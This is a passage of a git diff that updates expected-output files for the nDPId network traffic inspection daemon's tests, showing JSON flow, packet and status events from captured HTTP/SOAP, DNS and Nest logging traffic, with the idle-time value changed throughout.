ZlbG9wZSB4bWxuczpTPSJodHRwOi8vc2NoZW9hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+PFM6Qm9keT48bnMyOmNvbmZpZ3VyZVJlSnBvbnNlIHhtbG5zOm5zJQAidXJpOi8vYWxjYXRlbC5jb20vYXBjLzIuMCIvPjwvUzpCb2R5PjwvUzpFbnZlbG9wZT4="} 00578{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":8,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","packets-captured":8,"packets-processed":7,"total-skipped-flows":0,"total-l4-data-len":1494,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1258165452647} 00234{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":10,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","l4_data_len":542,"global_ts_msec":1258165452669} 01070{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":576,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":576,"pkt_l4_len":0,"thread_ts_msec":1258165452652,"pkt":"AFBWmXinAB9to6gACABFAAoyGs1AADwGeykKAwkTCkSJdp64H5sj28X747el5lAYwhBevQAAUE9TVCAvQXBjbi9BcGNSZW1vdGVTZXJ2aVhlIEhUVFAvMS4xDQpTT09QQWN0aW9uOiANCkNvbnRlbnQtdHlwZTogQXBwbGljYXRpb24veG1sDQpVc2VyLUFnZW50OiBKYWthcnRhIENvbW1vbnMtSHR0cENsaWVudC8zLjAuMQ0KSG9zdDogMTAuNjguMTM3LjExODo4MDkxDQpDb250ZW50LUxlbmd0aDogMzQ0DQoNCjxzb2FwZW52OkVudmVsb3BlIHhtbG5zOm5zPSJ1cmk6Ly9hbGNhdGVsLmNvbS9hcGMvMi4wIiB4bWxuczpzb2FwZW52PSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zcmFwL2VudmVsb3BlLyI+CiAgPHNvYXBlbnY6SGVhZGVyLz4KICA8c29hcGVudjpC8WR5PgogICAgPG5zOmdldENvbmZpZ3VyZWRUZW1wbGF0ZT4KICAgICAgPG9iamVjdE5hbWU+TldNOToxLTEtMS0xOTwvb2JqZWN0TmFtZT4KICAgICAgPHRlbXBsYXRlTmFtZT5YRFNMX0FUTV9QVE08L3RlbXBsYXRlTmFtZT4KICAgIDwvbnM6Z6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00958{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1258162014557,"flow_last_seen":1258165452688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":2179,"flow_avg_l4_payload_len":167,"midstream":0,"thread_ts_msec":1258165452688,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00958{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1258162014557,"flow_last_seen":1258165452688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":2179,"flow_avg_l4_payload_len":167,"midstream":0,"thread_ts_msec":1258165452688,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00584{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","packets-captured":14,"packets-processed":13,"total-skipped-flows":0,"total-l4-data-len":2179,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":1258165452688} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 14/13 diff --git a/test/results/nest_log_sink.pcap.out b/test/results/nest_log_sink.pcap.out index 0c668611e..d9e38250f 100644 --- a/test/results/nest_log_sink.pcap.out +++ b/test/results/nest_log_sink.pcap.out @@ -1,37 +1,37 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"nest_log_sink.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1536712992228} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536712992228,"flow_last_seen":1536712992228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536712992228,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1536712992228,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536712992228,"pkt":"AJD7JidrGLQwJjRACABFAAAoL2IAAP8GYxrAqPIPI65S7fdsK1cIqL8\/xIBhhVAQD+Vl6gAAAAAAAAAA"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1536712992289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1536712992289,"pkt":"GLQwJjRAAJD7JidrCABFAAAoNpRAAC0G7egjrlLtwKjyDytX92zEgGGFCKi\/QFAQgdDz\/QAA"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1536713052295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536713052295,"pkt":"AJD7JidrGLQwJjRACABFAAAoL2MAAP8GYxnAqPIPI65S7fdsK1cIqL8\/xIBhhVAQD+Vl6gAAAAAAAAAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536712992228,"flow_last_seen":1536712992228,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536712992228,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1536712992228,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536712992228,"pkt":"AJD7JidrGLQwJjRACABFAAAoL2IAAP8GYxrAqPIPI65S7fdsK1cIqL8\/xIBhhVAQD+Vl6gAAAAAAAAAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1536712992289,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1536712992289,"pkt":"GLQwJjRAAJD7JidrCABFAAAoNpRAAC0G7egjrlLtwKjyDytX92zEgGGFCKi\/QFAQgdDz\/QAA"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1536713052295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536713052295,"pkt":"AJD7JidrGLQwJjRACABFAAAoL2MAAP8GYxnAqPIPI65S7fdsK1cIqL8\/xIBhhVAQD+Vl6gAAAAAAAAAA"} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":51,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":51,"packets-processed":30,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1536713593921} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":52,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1536712992228,"flow_last_seen":1536713593982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536713593982,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1536712992228,"flow_last_seen":1536713593982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536713593982,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":52,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1536712992228,"flow_last_seen":1536713593982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536713593982,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1536712992228,"flow_last_seen":1536713593982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536713593982,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":101,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":101,"packets-processed":60,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1536714195599} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1536714602587,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536714602587,"pkt":"AJD7JidrGLQwJjRACABFAABEL4kAAP8RJr3AqPIPwKjyAc5xADUAMKk+CwgBAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1536714602587,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536714602587,"pkt":"GLQwJjRAAJD7JidrCABFAABUsrpAAEARInzAqPIBwKjyDwA1znEAQGW0CwiBgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602612,"flow_last_seen":1536714602612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714602612,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1536714602612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714602612,"pkt":"AJD7JidrGLQwJjRACABFAAAsL4oAAP8GGxPAqPIPI7yauvduK1cIvyQjAAAAAGACEgDGgwAAAgQEgAAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1536714602681,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714602681,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX927RT8zNCL8kJGASbvDKWAAAAgQFjA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1536714602684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714602684,"pkt":"AJD7JidrGLQwJjRACABFAAAoL4sAAP8GGxbAqPIPI7yauvduK1cIvyQk0U\/MzlAQEgA+3gAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714602612,"flow_last_seen":1536714604778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714604778,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602612,"flow_last_seen":1536714602612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714602612,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1536714602612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714602612,"pkt":"AJD7JidrGLQwJjRACABFAAAsL4oAAP8GGxPAqPIPI7yauvduK1cIvyQjAAAAAGACEgDGgwAAAgQEgAAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1536714602681,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714602681,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX927RT8zNCL8kJGASbvDKWAAAAgQFjA=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1536714602684,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714602684,"pkt":"AJD7JidrGLQwJjRACABFAAAoL4sAAP8GGxbAqPIPI7yauvduK1cIvyQk0U\/MzlAQEgA+3gAAAAAAAAAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714602612,"flow_last_seen":1536714604778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714604778,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1536714607328,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1536714607328,"pkt":"AJD7JidrGLQwJjRACABFAABXL7IAAP8RJoHAqPIPwKjyAc5xADUAQyQGbMYBAAABAAAAAAAAB2N6ZmUxMDUHZnJvbnQwMQVpYWQwMQpwcm9kdWN0aW9uBG5lc3QDY29tAAABAAE="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714607530,"flow_last_seen":1536714607530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714607530,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1536714607530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714607530,"pkt":"AJD7JidrGLQwJjRACABFAAAsL7MAAP8GYsXAqPIPI65S7fdvK1cIymiPAAAAAGACEgDJ5gAAAgQEgAAA"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1536714607594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714607594,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX92+qr\/jxCMpokGASaQPN\/AAAAgQFtA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1536714607597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714607597,"pkt":"AJD7JidrGLQwJjRACABFAAAoL7QAAP8GYsjAqPIPI65S7fdvK1cIymiQqq\/48lAQEgA8vQAAAAAAAAAA"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714607530,"flow_last_seen":1536714609684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714609684,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714610253,"flow_last_seen":1536714610253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714610253,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 